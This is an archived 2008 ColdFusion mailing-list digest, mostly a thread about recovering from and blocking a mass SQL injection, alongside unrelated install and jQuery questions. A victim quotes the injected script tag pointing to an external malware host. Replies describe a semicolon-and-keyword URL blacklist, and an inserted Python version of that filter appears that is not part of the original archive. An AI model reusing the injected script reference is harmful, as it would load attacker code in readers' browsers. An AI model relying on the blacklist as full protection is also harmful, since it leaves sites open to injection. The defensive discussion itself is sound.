Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310407
RE: HELP! SQL Injection Attack!
Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

-Original Message- From: Bruce Schuman [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 12:17 To: CF-Talk Subject: RE: HELP! SQL Injection Attack!

The attack appends JavaScript to character fields.

Hi. Just checking in here on SQL injection -- I am a self-taught self-employed CF programmer, been doing this for quite a while, but there is a ton I don't know. And I have been hit by this current wave of injection. So, my SQL Server 2005 database doesn't just get one record injected. It's every record in a particular field, all containing (in this attack) this code script src=http://jjmaoduo.3322.org/csrss/w.js; and a few more things in html I didn't include. What I have done to protect about 15 CF sites -- is simply require that integer values be integers -- by cfincluding a list of params like this, from application.cfm:

    <CFIF IsDefined("groupid")><CFPARAM NAME="groupid" TYPE="integer"></CFIF>
    <CFIF IsDefined("login")><CFPARAM NAME="login" TYPE="integer"></CFIF>
    <CFIF IsDefined("sg")><CFPARAM NAME="sg" TYPE="integer"></CFIF>
    <CFIF IsDefined("messageid")><CFPARAM NAME="messageid" TYPE="integer"></CFIF>
    <CFIF IsDefined("msg")><CFPARAM NAME="msg" TYPE="integer"></CFIF>

So, this text script has been injected into every record in about five fields in my users table -- and also into a variety of other tables in the same way: every record in that table, in some selected fields. All these injected fields are text fields -- URLs, addresses. Can this be done through a URL? Does the list of fields that have been injected provide any clue about how or where the injection attack occurred? How do these guys, or their program, know my table names and my field names? I have some very obscure field names, and they still get them injected - they are not guessing these things, they know the name of the field. If I wanted to duplicate what they did, I would write a loop that would go through every record in the table, and CFUPDATE that particular record. In fact, I wrote scripts like this to remove this junk, setting the record back to what it was before the injection. How do they do this? Anyway, got my hands full. Any thoughts on this would be great. And yes, I'd like to see the URL loop script that was offered by Justin Scott

Actually, with this particular SQL injection attack it's really easy to stop. We created a SQL filter that is called from application.cfm. It loops through the URL structure and checks to see if any URL variables contain both a semi-colon and any SQL keyword. If a match is found, it just cfaborts the request and sends us an e-mail with the details. We periodically review those messages and have not found a single false-positive yet after deployment to every site we manage. Granted, it will not stop SQL injection through form posts, but I don't recall ever seeing a SQL injection attack through a form post (yet). At the least it can put an immediate stop to the current flood and give you time to implement other protective measures such as cfqueryparam, etc. We have CF5 and CFMX versions if anyone wants a copy.

Bruce Schuman Santa Barbara CA http://originresearch.com

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310408
RE: HELP! SQL Injection Attack!
Can this be done through a URL?

Yes, easily.

Does the list of fields that have been injected provide any clue about how or where the injection attack occurred? How do these guys, or their program, know my table names and my field names? I have some very obscure field names, and they still get them injected - they are not guessing these things, they know the name of the field. If I wanted to duplicate what they did, I would write a loop that would go through every record in the table, and CFUPDATE that particular record. In fact, I wrote scripts like this to remove this junk, setting the record back to what it was before the injection. How do they do this?

Your database contains all its object names in metadata tables, which can be queried directly. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310409
Re: HELP! SQL Injection Attack!
And yes, I'd like to see the URL loop script that was offered by Justin Scott

I've had many requests for the SQL injection prevention script, so I'm just going to post a URL directly to the code and release it into the public domain for anyone interested: http://www.gravityfree.com/_sqlprev.cfm.txt -Justin Scott

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310410
Re: Installation of CF 8 (developer edition) is not working
Torrent Girl wrote: Ok I am starting from scratch :) I'll go to lunch and not work on anything else to prevent hiccups (hopefully)

When you get your good download, before you run it you will want to make sure you have completely uninstalled all your previous attempts. Here is Adobe knowledge base article on how to manually uninstall ColdFusion. It is titled for MX 6 and 7 but I think it would still apply to 8. If not there should be an 8 version out there somewhere. http://kb.adobe.com/selfservice/viewContent.do?externalId=tn_19187&sliceId=1

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310411
Re: Installation of CF 8 (developer edition) is not working
From: Torrent Girl [EMAIL PROTECTED] yes, Ian as a matter of fact I remembered seeing an error message when I downloaded it that it was incomplete. I completely forgot about that.

Slaps hand on forehead. That would definitely cause you problems. Let us know how it goes after you get a freshly downloaded *complete* install. I'm rather surprised that the install ran at all. ~Brad

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310412
RE: HELP! SQL Injection Attack!
Thanks, Andy and Ian -- I am going through this previous thread (I did get hit with this 2 or 3 weeks ago also) -- so, I am just wondering how I can get a basic/minimal level of protection installed, maybe linked from application.cfm. I must have 100,000 pages I need to protect -- and my primary database has something like 180 tables, some of which have more than 100 fields. So, I need something I can do quickly. And I got a lot to learn about this. So, just probing this one question -- what people are saying is -- it comes through a URL -- and not a user forms-submission (or at least that seems to be the case) ?? Here's a question: If it is possible to do a basic general-purpose kind of input filtering from application.cfm -- not as good as going through every query, but something that can be done quickly -- would it be possible to write a kind of generic protection script? The specifics of this script would depend on the variables/fieldnames/datatypes -- but if we had a general-purpose script, 1) stop attack type-A 2) stop attack type-B 3) stop attack type-C programmer to fill in the blanks -- ie, itemize the field names and types. Could that be done? If that were possible, that would be a great help. Thanks for this good discussion. - Bruce

Bruce Schuman wrote: How do they do this?

Yes it is done through the URL. This is well discussed here and in many blogs. But the gist is that the errant URL parameter is an ENTIRE SQL function that will tell your database to scan every table looking at every field, and if the field is a character field, to append the payload to that field.

Actually, with this particular SQL injection attack it's really easy to stop. We created a SQL filter that is called from application.cfm. It loops through the URL structure and checks to see if any URL variables contain both a semi-colon and any SQL keyword. If a match is found, it just cfaborts the request and sends us an e-mail with the details. We periodically review those messages and have not found a single false-positive yet after deployment to every site we manage. Granted, it will not stop SQL injection through form posts, but I don't recall ever seeing a SQL injection attack through a form post (yet). At the least it can put an immediate stop to the current flood and give you time to implement other protective measures such as cfqueryparam, etc. We have CF5 and CFMX versions if anyone wants a copy.

At 09:25 AM 8/7/2008, you wrote: Bruce... Without going into the whole thing, the script runs in your database and selects against the systables and syscolumns tables. It then loops over these and performs updates on existing records. You really need to go back and read the entire thread from 3 weeks ago. http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065 It has everything you'd need to know about what this attack does, how to reverse the results, and lastly how to prevent it from happening again. andy

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310413
Re: Installation of CF 8 (developer edition) is not working
A service specific error occured 2... EXPLANATION A service specific error occured

Ok, nevermind, I was hoping the real error message would get output to the screen. It appears your problem has been identified as an incomplete download, but for the record though, what I should have had you do was run this from the command line: c:\coldfusion8\runtime\bin\jrun.exe -config jvm.config -start coldfusion This gives you the same output that is placed in your C:\ColdFusion8\runtime\logs\coldfusion-out.log file which would have included the error message about jrun.jar not existing. (Note: this would be for the stand alone installation I believe) ~Brad

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310414
RE: HELP! SQL Injection Attack!
Thanks for the code, I'm in the process of cleaning all the query calls for my client and been seeing lots of posts regarding this sql injection. There are a couple thousand queries that I have to clean up but while I'm in the process of cleaning they're getting injected over and over and over!! So I did something similar to this, not as in depth, but I added some logic to application.cfm to check cgi.query_string for parts of the injection script. What I'm wondering is the pros and cons of doing it this way. Does it slow down the app checking for this on every page hit? Or do it the old-fashioned way and clean up all the queries. Thoughts?

-Original Message- From: Justin Scott [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 10:36 AM To: CF-Talk Subject: Re: HELP! SQL Injection Attack!

And yes, I'd like to see the URL loop script that was offered by Justin Scott

I've had many requests for the SQL injection prevention script, so I'm just going to post a URL directly to the code and release it into the public domain for anyone interested: http://www.gravityfree.com/_sqlprev.cfm.txt -Justin Scott

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310415
Re: HELP! SQL Injection Attack!
I must have 100,000 pages I need to protect -- and my primary database has something like 180 tables, some of which have more than 100 fields. So, I need something I can do quickly. And I got a lot to learn about this.

See my previous post regarding this code which can be placed in front of an application as a stop-gap measure to give you time to patch everything properly: http://www.gravityfree.com/_sqlprev.cfm.txt -Justin Scott

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310416
Re: HELP! SQL Injection Attack!
What I'm wondering is the pros and cons of doing it this way. Does it slow down the app checking for this on every page hit? Or do it the old-fashioned way and clean up all the queries. Thoughts?

That depends on what your definition of slow is. On a modern server a simple check for a specific string anywhere in the URL as you described isn't going to even show up in speed testing. The code I posted is more robust and takes a couple ms to run, but unless your server is getting absolutely hammered the difference in execution time shouldn't be at all noticeable. I will emphasize that the front-end URL scanning is meant as a first line of defense. It will help, but protection on individual queries and input validation should still be considered best practice going forward, and implemented on older code if time and budget permit. -Justin Scott

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310417
Re: Installation of CF 8 (developer edition) is not working
Ok guys I am up and running. I downloaded again and reinstalled. Thank you ALL for your help and patience.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310418
Re: Installation of CF 8 (developer edition) is not working
Glad to hear that! ~Brad

- Original Message - From: Torrent Girl [EMAIL PROTECTED] To: CF-Talk cf-talk@houseoffusion.com Sent: Thursday, August 07, 2008 1:27 PM Subject: Re: Installation of CF 8 (developer edition) is not working

Ok guys I am up and running. I downloaded again and reinstalled. Thank you ALL for your help and patience.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310419
Re: HELP! SQL Injection Attack!
- Original Message - From: Bruce Schuman [EMAIL PROTECTED]

I must have 100,000 pages I need to protect --

Better get started then. :) Read about two tools that can make the job easier for you: http://www.codersrevolution.com/index.cfm/2008/7/24/Announcing-the-first-ever-International-Operation-cfSQLprotect Whatever stop-gaps or filtering mechanisms you put in place, your final solution needs to include parameterizing inputs to all your queries. ~Brad

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310420
Re: HELP! SQL Injection Attack!
I'd be interested in seeing this also.

We have CF5 and CFMX versions if anyone wants a copy.

-Justin Scott

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310421
Re: CFwindow and jquery in source
Another example: I have a global jquery field highlighter that runs for all my forms of a specific class. It also relies on the document ready. It's working for the main form, but not the form that is included by the cfwindow tag.

    ==========
    <head>
    <script> highlighter </script>
    </head>
    <form>  //works ok here!
    <input>
    </form>
    <cfwindow source="anotherForm" />  //this popup doesn't get any jquery love.
    ==========

So, in that instance the form on the page is working properly, but the anotherForm won't run any jQuery script that relies on the document ready. Of course, anotherForm would work if it were called directly.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310422
RE: HELP! SQL Injection Attack!
Justin, Good effort... It does not check the form scope however - or CGI (a rarely used but still vulnerable scope). As has been pointed out, a blacklist function like this one will result in a good number of false positives for items that are legitimate. Also note that not every DB platform requires a semi-colon for end of statement. Some of them allow for line breaks for example (at least in the default installation). -Mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com

-Original Message- From: Justin Scott [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 12:36 PM To: CF-Talk Subject: Re: HELP! SQL Injection Attack!

And yes, I'd like to see the URL loop script that was offered by Justin Scott

I've had many requests for the SQL injection prevention script, so I'm just going to post a URL directly to the code and release it into the public domain for anyone interested: http://www.gravityfree.com/_sqlprev.cfm.txt -Justin Scott

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310423
Re: CFwindow and jquery in source
where is your <script src="jquery.js"></script>? it needs to be in the page that creates the cfwindow... not in the page that resides in the cfwindow.

On Thu, Aug 7, 2008 at 11:35 AM, Justin T [EMAIL PROTECTED] wrote: Another example: I have a global jquery field highlighter that runs for all my forms of a specific class. It also relies on the document ready. It's working for the main form, but not the form that is included by the cfwindow tag.

    ==========
    <head>
    <script> highlighter </script>
    </head>
    <form>  //works ok here!
    <input>
    </form>
    <cfwindow source="anotherForm" />  //this popup doesn't get any jquery love.
    ==========

So, in that instance the form on the page is working properly, but the anotherForm won't run any jQuery script that relies on the document ready. Of course, anotherForm would work if it were called directly.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310424
Re: CFwindow and jquery in source
where is your <script src="jquery.js"></script>? it needs to be in the page that creates the cfwindow... not in the page that resides in the cfwindow.

On Thu, Aug 7, 2008 at 11:35 AM, Justin T [EMAIL PROTECTED] wrote: Hi Charlie, I tried it both ways, in the source document, in the caller as an import, and both. Mind you, it's only jquery that relies on the $ready that's having the issue (even my global template jquery stuff). I have tested generic jquery code to work outside of the ready initializer and that works fine. It's really like something needs to let the jquery know the source document from the get is ready in addition to the main document.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310425
Re: HELP! SQL Injection Attack!
Good effort... It does not check the form scope however - or CGI

Since nearly all SQL injection attempts come through the URL (including the recent ones), that is where I put the focus. With this script I would not recommend checking the form scope as there is too high a risk of false positives. I've never heard of an injection attack coming through CGI variables. I suppose it's possible, but the percentage of queries using CGI scope data is probably minuscule compared to URL variables.

As has been pointed out, a blacklist function like this one will result in a good number of false positives for items that are legitimate.

I would replace "will" with "may" in that statement, and then agree. We've been using this internally for years without any false positives (yet).

Also note that not every DB platform requires a semi-colon for end of statement. Some of them allow for line breaks for example (at least in the default installation).

Ours was designed for SQL Server; perhaps I should have pointed that out earlier. I'll reiterate again that it's not meant as a guaranteed SQL injection stopper, just a quick way to provide a first line defense while you patch up your queries properly. -Justin Scott

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310426
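The stop-gap URL-scope check discussed in this thread (flag a request when a URL variable contains both a semi-colon and a SQL keyword, then abort and notify), written as an added Python example rather than Justin Scott's _sqlprev.cfm or any code from the list. The keyword list, the function names and the sample requests are assumptions constructed for illustration; the last two samples show the caveats raised above, a legitimate value that trips the blacklist and a keyword-only value that the semi-colon rule lets through.

```python
import re
from urllib.parse import unquote_plus

# Assumed SQL Server-centric keyword list (not Justin's exact list); matched as
# whole words, case-insensitively, so "selection" or "updated" do not count.
SQL_KEYWORDS = ("select", "insert", "update", "delete", "drop", "declare",
                "exec", "cast", "union", "alter", "create", "truncate")
_KEYWORD_RE = re.compile(r"\b(" + "|".join(SQL_KEYWORDS) + r")\b", re.IGNORECASE)


def parse_url_scope(query_string):
    """Decode a raw query string into (name, value) pairs, like CF's URL scope.

    Splits on '&' only, so a ';' (raw or %3B-encoded) inside a value survives
    to be inspected instead of being treated as a parameter separator.
    """
    params = []
    for part in query_string.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    return params


def suspicious_params(query_string):
    """Return the (name, value) pairs containing BOTH ';' and a SQL keyword."""
    return [(name, value) for name, value in parse_url_scope(query_string)
            if ";" in value and _KEYWORD_RE.search(value)]


def check_request(remote_addr, script_name, query_string):
    """Gatekeeper equivalent of the application.cfm filter.

    Returns None to let the request through, otherwise the detail string the
    filter would e-mail to the operators before aborting the request.
    """
    hits = suspicious_params(query_string)
    if not hits:
        return None
    detail = "; ".join("%s=%r" % (name, value) for name, value in hits)
    return "blocked %s %s: %s" % (remote_addr, script_name, detail)


# Constructed sample requests (addresses from the RFC 5737 documentation range).
CONSTRUCTED_REQUESTS = [
    ("203.0.113.5", "/news.cfm", "id=42&sort=date"),            # clean
    ("203.0.113.5", "/news.cfm", "id=42%3Bdrop+table+users"),    # ';' + keyword: blocked
    ("198.51.100.9", "/contact.cfm",
     "note=Please+select+red%3B+not+blue"),                     # false positive: blocked
    ("198.51.100.9", "/search.cfm", "q=select"),                # keyword alone: allowed
]

if __name__ == "__main__":
    for addr, script, qs in CONSTRUCTED_REQUESTS:
        verdict = check_request(addr, script, qs)
        print(verdict if verdict else "allowed %s?%s" % (script, qs))
```

Note that, like the script under discussion, this looks only at the URL scope: form posts and CGI variables are not inspected, and a blacklist of this kind is a first line of defense, not a substitute for cfqueryparam on every query.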
Missing Template Handler is missing
I'm trying to configure the Missing Template Handler on an old CF4.5 Unix based server. Our web shop has created a custom 404 incorporating the look and feel of our site. Its path is simply /errors/404error.htm. The apache web server has been properly configured to use this for static content 404 errors. They would also like this to be used for missing CF template errors. I put in '/errors/404error.htm' into the Missing Template Handler field in the administrator and nothing happened. I also tried it without the initial slash and still no good. What do I need to do so that ColdFusion will serve up the http://www.cdpr.ca.gov/errors/404error.htm file?

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310427
Re: Installation of CF 8 (developer edition) is not working
Torrent Girl wrote: Ok guys I am up and running. I downloaded again and reinstalled. Thank you ALL for your help and patience.

I'll bet you will never forget to check the download numbers again. I know I don't since this happened to me a few years ago.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310428
Re: Missing Template Handler is missing
Have you tried everything mentioned at http://kb.adobe.com/selfservice/viewContent.do?externalId=95ee04fb ?

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310429